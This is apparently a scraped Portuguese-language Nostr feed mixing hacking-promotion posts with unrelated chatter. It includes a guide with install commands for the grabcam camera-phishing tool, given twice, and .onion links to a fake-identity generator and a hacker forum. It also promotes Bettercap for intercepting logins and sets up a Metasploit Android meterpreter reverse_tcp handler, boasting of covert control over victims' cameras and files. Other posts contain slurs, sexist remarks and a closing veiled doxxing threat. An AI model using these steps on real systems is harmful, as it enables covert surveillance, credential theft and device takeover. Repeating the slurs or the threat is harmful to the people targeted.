
**O que é e como funciona o Grabcam?**
O grabcam é um script simples, geralmente escrito em Shell e PHP, projetado para criar uma página de phishing que engana o usuário para que ele conceda acesso à sua câmera.
> Não é uma ferramenta avançada, mas serve como um excelente exemplo prático para entender os conceitos básicos de engenharia social e ataques de phishing.

O funcionamento geralmente segue estes passos:
1.Execução do Script: Ao rodar o grabcam.sh, o script inicia um servidor web local (usando PHP) e gera um link malicioso.
2.Engenharia Social: O próximo passo, que não faz parte da ferramenta em si, é a engenharia social. O atacante precisa convencer a vítima a clicar nesse link. O link geralmente é mascarado para parecer algo legítimo, como um prêmio, um site de notícias ou um portal de login.
3.Página Falsa (Phishing): Quando a vítima acessa o link, ela se depara com uma página falsa que solicita permissão para acessar a câmera do dispositivo (celular ou computador). A página pode usar pretextos como "verificação de identidade por foto" ou "teste de webcam".
4.Captura de Imagem: Se a vítima conceder a permissão, o site tira uma ou mais fotos usando a câmera frontal do dispositivo e as envia para o servidor do atacante, que no caso do grabcam, é a máquina onde o script foi executado.
5.Armazenamento : As imagens capturadas são salvas em um diretório no computador do atacante, que pode então visualizá-las.
Comandos de instalação no termux:
apt-get update -y e apt-get upgrade -y
pkg install python -y e pkg install python2 -y
pkg install git -y
pip install lolcat
git clone https://github.com/noob-hackers/grab
cd grabcam
bash grabcam.sh
Em resumo, o grabcam não é uma ferramenta "grandiosa" ou complexa, mas é um excelente ponto de partida para estudantes de segurança da informação. Ele demonstra de forma clara e prática como um ataque de phishing pode ser construído e como a engenharia social é crucial para o sucesso de um ataque.
██████╗
██╔════╝
██║
██║
╚██████╗
╚═════╝
██████╗
██╔═══██╗
██║ ██║
██║ ██║
╚██████╔╝
╚═════╝
███╗ ███╗
████╗ ████║
██╔████╔██║
██║╚██╔╝██║
██║ ╚═╝ ██║
╚═╝ ╚═╝
██████╗
██╔══██╗
██████╔╝
██╔═══╝
██║
╚═╝
██████╗
██╔══██╗
██████╔╝
██╔══██╗
██║ ██║
╚═╝ ╚═╝
███████╗
██╔════╝
█████╗
██╔══╝
███████╗
╚══════╝
██████╗
██╔══██╗
██████╔╝
██╔══██╗
██████╔╝
╚═════╝
██╗
██║
██║
██║
██║
╚═╝
████████╗
╚══██╔══╝
██║
██║
██║
╚═╝
██████╗
██╔════╝
██║
██║
╚██████╗
╚═════╝
██████╗
██╔═══██╗
██║ ██║
██║ ██║
╚██████╔╝
╚═════╝
██╗
██║
██║
██║
██║
╚═╝
███╗ ██╗
████╗ ██║
██╔██╗ ██║
██║╚██╗██║
██║ ╚████║
╚═╝ ╚═══╝

**O que é e como funciona o Grabcam?**
O grabcam é um script simples, geralmente escrito em Shell e PHP, projetado para criar uma página de phishing que engana o usuário para que ele conceda acesso à sua câmera.
> Não é uma ferramenta avançada, mas serve como um excelente exemplo prático para entender os conceitos básicos de engenharia social e ataques de phishing.

O funcionamento geralmente segue estes passos:
1.Execução do Script: Ao rodar o grabcam.sh, o script inicia um servidor web local (usando PHP) e gera um link malicioso.
2.Engenharia Social: O próximo passo, que não faz parte da ferramenta em si, é a engenharia social. O atacante precisa convencer a vítima a clicar nesse link. O link geralmente é mascarado para parecer algo legítimo, como um prêmio, um site de notícias ou um portal de login.
3.Página Falsa (Phishing): Quando a vítima acessa o link, ela se depara com uma página falsa que solicita permissão para acessar a câmera do dispositivo (celular ou computador). A página pode usar pretextos como "verificação de identidade por foto" ou "teste de webcam".
4.Captura de Imagem: Se a vítima conceder a permissão, o site tira uma ou mais fotos usando a câmera frontal do dispositivo e as envia para o servidor do atacante, que no caso do grabcam, é a máquina onde o script foi executado.
5.Armazenamento : As imagens capturadas são salvas em um diretório no computador do atacante, que pode então visualizá-las.
Comandos de instalação no termux:
apt-get update -y e apt-get upgrade -y
pkg install python -y e pkg install python2 -y
pkg install git -y
pip install lolcat
git clone https://github.com/noob-hackers/grab
cd grabcam
bash grabcam.sh
Em resumo, o grabcam não é uma ferramenta "grandiosa" ou complexa, mas é um excelente ponto de partida para estudantes de segurança da informação. Ele demonstra de forma clara e prática como um ataque de phishing pode ser construído e como a engenharia social é crucial para o sucesso de um ataque.

Hoje eu quero te mostrar um site da **deep web** que chama bastante atenção.
O endereço é:
elfqv3zjfegus3bgg5d7pv62eqght4h6sl6yjjhe7kjpi2s56bzgk2yd.onion.
>Ele é um gerador de identidades falsas.
Ali, você encontra nomes, endereços, números de documentos e até dados bancários, tudo criado do zero.
>Muita gente olha pra isso e pensa logo no uso errado.
Mas a real é que esses sites existem também pra simulações, pra testes de segurança e até pra estudos sobre engenharia social.
A questão é simples: **esse tipo de recurso pode ser uma arma… ou só mais uma ferramenta de conhecimento.
Depende de quem usa.**
Agora me diz, o que você faria se tivesse acesso a uma identidade que nunca existiu?
Na deep web, o poder não está só nos códigos, mas em saber o que poucos sabem.
#deepweb #hackers #nostr #bitcoin #fakeid #hacking #Brasil #digital #id #onion #darkweb
Tenho que admitir que isso ficou bom. https://video.nostr.build/8fb51fdebfa352a6fa45438d38c0becb5b216b2256387f2cdeaa277b16024805.mp4
#lula #janja #13 #Brasil #Brazil #circo #bitcoin #nostr #palhaço
Também gosta de música clássica? Excelente 🫂
⠀⠀⠀⠀⠀⠀⣀⣠⡴⠶⠛⠛⠛⠛⠛⣿⣦⡀⠀⠀ ⠀⠀⠀⠀⠀⣀⡴⠋⠉⠀⠀⠀⠀⠀⠀⠀⣿⠀⣿⠀⠀ ⠀⠀⠀⠀⣀⣾⣵⣶⣿⣿⣿⣿⣿⣦⡀⠀⣿⠀⣿⠀⠀ ⠀⠀⠀⠀⣾⣿⡿⠀⠀⠈⢻⣿⠿⠿⠟⠀⣿⠀⣿⠀⠀ ⠀⠀⠀⠀⢹⡟⠁⠀⠀⣰⠟⠀⠀⠀⠀⠀⣿⠀⣿⠀⠀ ⠀⠀⠀⣴⠟⠀⠀⠀⣼⠏⠀⠀⠀⠀⠀⠀⣿⠀⣿⠀⠀ ⠀⣴⣾⣁⣀⣀⣀⠀⣿⡀⠀⠀⠀⠀⠀⣼⠟⠀⣿⠀⠀ ⠀⢿⣅⠀⢿⣿⣾⣍⣻⡇⠀⠀⠀⠀⠀⣿⠀⠀⣿⠀⠀ ⠀⣼⡿⠶⠶⠿⠟⠛⠉⠀⠀⠀⠀⠀⠀⣿⣠⣼⡿⠀⠀ ⠀⣿⣿⣿⣿⡷⠶⠆⠀⠀⠀⠀⠀⠀⠀⣿⡏⠉⠀⠀⠀ ⠀⣿⣿⠿⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⠸⠀⠀⠀⠀ ⠀⣿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣶⣯⠀⠀⠀⠀⠀ ⣾⠋⠀⠀⠀⠀⠀⢀⣀⣠⣤⣶⣿⠿⠋⠙⣦⡀⠀⠀⠀ ⠙⠷⢶⣶⣶⣿⣿⣿⣿⣿⡿⠟⠁⠀⠀⠀⠛⠻⣄⠀⠀ ⠀⠀⣼⣿⣿⣿⣿⡿⠟⠉⠀⠀⠀⠀⠀⠀⠀⠀⠙⣧⠀ ⠀⣰⣿⣿⣿⡟⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣾ ⠀⣿⣿⠿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢱⣿ ⣾⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⡤⠖⠋⠉ ⠻⢷⣤⣤⣤⣤⣤⣤⣤⣤⡶⠶⠞⠛⠉⠉⠁
Muito bom. Mesmo não tendo sido o dia mais produtivo, não ouve nada que pudesse atrapalhar o meu dia
Eu acho que ela um homem mesmo kakakak
Já aproveita e dá uma olhada no meu perfil
Ambiente de academia não mais lugar para homens, imagina empreender uma academia só para homens? Não aceita muié ou viado, vai ficar rico 🤑.
https://video.nostr.build/ecde77d66ea610cba1f703f5b18509a750e912a43524c6737398d06ef5c7f21d.mp4
Eu pessoalmente acharia excelente ter academias só pra homem 🚹 💪

> DEFESA-ATAQUE – INJECTOR DE PACOTES COM BETTERCAP
Você já ouviu o ditado:
"Quem controla a rede, controla o jogo."
**Bettercap** é isso
Uma caixa de ferramentas de manipulação de tráfego em tempo real.
Mas no **Termux**… é como carregar um míssil em um celular.
Quer mapear dispositivos conectados?
Interceptar logins em HTTP?
Injetar código em páginas?
Monitorar redes Wi-Fi?
Tudo isso, sem precisar de root.
Sim. Ele roda direto no seu bolso.
Você vira o meio do caminho entre vítima e internet.
Cada clique dela passa por você.
Cada senha. Cada requisição. Cada falha.
> Porque às vezes o poder não está no ataque.
Está na posição certa, na hora certa — e com a ferramenta certa.
#bettercap #networkhacking #maninthemiddle #termux #packetinjection #nostr #infosec #hacking #cibersegurança #cibersecurity
Disponibilizando um fórum hacker da deep web: http://hellhoh5o35sylxrpfu45p5r74n2lzvirnvszmziuvn7bcejlynaqxyd.onion/

> EXPLOIT – METASPLOIT
Tem gente que invade gritando.
Outros… entram como fantasmas.
Metasploit não é só uma ferramenta —
É um campo de batalha inteiro dentro do seu Termux.
Você não precisa quebrar portas.
Você abre fechaduras com classe.
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost SEU_IP
set lport 4444
run
A vítima toca na tela.
Você ganha um portal direto pro sistema dela.
Câmera? Sua.
Microfone? Seu.
Arquivos, localização, acesso total? Também seus.
Sem alarme. Sem rastros. Sem chance de defesa.
Você não está ali só pra invadir.
Você tá ali pra dominar sem ser notado.
Porque quem sabe o que faz... nunca é visto chegando.
> E o mundo digital não pertence a quem tem mais força.
Pertence a quem tem mais consciência tática.
#metasploit #cyberintel #termux #invasão #ethicalhacking #nostr #deeptech
Não adianta nostr:nprofile1qqspxhftq9htg9njgaefr6nmetl97q8qqlwxvynppl6c5zr9t0qmp9gpzfmhxue69uhhqatjwpkx2urpvuhx2ucpz3mhxue69uhhyetvv9ujuerpd46hxtnfduq3qamnwvaz7tmwdaehgu3wwa5kueguy3tt5 todos sabemos quem é você. Tenho essa até uma foto sua: 







